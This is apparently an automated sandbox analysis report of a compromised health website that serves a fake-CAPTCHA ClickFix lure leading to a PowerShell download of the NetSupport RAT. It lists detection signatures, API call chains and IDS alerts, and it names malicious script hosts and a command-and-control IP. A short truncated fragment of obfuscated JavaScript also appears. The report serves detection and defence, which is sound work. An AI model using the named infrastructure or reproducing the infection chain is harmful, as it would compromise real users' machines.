Windows Analysis Report
http://fountainofhealth.ca

General Information

Sample URL: http://fountainofhealth.ca
Analysis ID: 1696974
Infos: yarasigma

Detection

NetSupport RAT, CAPTCHA Scam ClickFix
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detect drive by download via clipboard copy & paste
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
Contains functionality to detect sleep reduction / modifications
Contains functionality to change the wallpaper
Delayed program exit found
HTML page adds suspicious text to clipboard
HTML page contains obfuscated javascript
Installs a global event hook (focus changed)
Installs a global keyboard hook
Obfuscated command line found
Powershell drops PE file
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a global mouse hook
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Conhost Spawned By Uncommon Parent Process
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Potentially Suspicious Rundll32 Activity
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Uses threadpools to delay analysis
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

AV Detection

Source: https://lang3666.top/lv/xfa.js Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\Options\client32.exe ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\Options\remcmdstub.exe ReversingLabs: Detection: 16%
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary, 37_2_110AD570

Phishing

Source: Yara match File source: 0.2.pages.csv, type: HTML
Source: https://islonline.org/d.js HTTP Parser: (function(_0x56c4d6,_0x1184e4){const _0x47dcd9=_0x11e7,_0x1961fe=_0x56c4d6();while(!![]){try{const _
Source: https://fountainofhealth.ca/en HTTP Parser: No favicon
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Options\msvcr100.dll Jump to behavior
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF011000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF100000.00000004.00000800.00020000.00000000.sdmp, client32.exe
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF011000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000022.00000002.1908768239.0000028FCEAD4000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: C:\Program Files (x86)\iTop VPN\vpnclient2.pdb7 source: powershell.exe, 00000022.00000002.1908768239.0000028FCF283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF1F9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000025.00000002.2412047042.0000000000D32000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCEAD4000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF157000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Program Files (x86)\iTop VPN\vpnclient2.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF1F9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: powershell.exe, 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 37_2_1102D330
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA, 37_2_11065890
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError, 37_2_1106A0A0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle, 37_2_111266E0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose, 37_2_1110AFD0
Source: chrome.exe Memory has grown: Private usage: 18MB later: 61MB

Networking

Source: Network traffic Suricata IDS: 2061385 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (islonline .org) : 192.168.2.17:61783 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2061385 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (islonline .org) : 192.168.2.17:55881 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2061388 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in TLS SNI (islonline .org) : 192.168.2.17:49733 -> 23.23.49.179:443
Source: Network traffic Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.17:49796 -> 94.158.245.131:443
Source: Network traffic Suricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.17:49796 -> 94.158.245.131:443
Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.17:49795 -> 35.206.121.228:443
Source: unknown TCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 52.109.28.46
Source: unknown TCP traffic detected without corresponding DNS query: 52.123.128.14
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 184.86.251.25
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /en HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /modules/ajax_loader/css/throbber-general.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/views/css/views-responsive-grid.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/core.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/controlgroup.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/resizable.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/checkboxradio.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/button.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/dialog.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/align.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/fieldgroup.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /npm/@unicorn-fail/drupal-bootstrap-styles@0.0.2/dist/3.4.0/8.x-3.x/drupal-bootstrap.css HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/container-inline.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/clearfix.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/details.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/hidden.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/item-list.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/js.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/nowrap.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/position-container.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/progress.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/reset-appearance.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /npm/bootstrap@3.4.1/dist/css/bootstrap.css HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /npm/bootstrap@3.4.1/dist/js/bootstrap.js HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /d.js HTTP/1.1host: islonline.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/resize.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
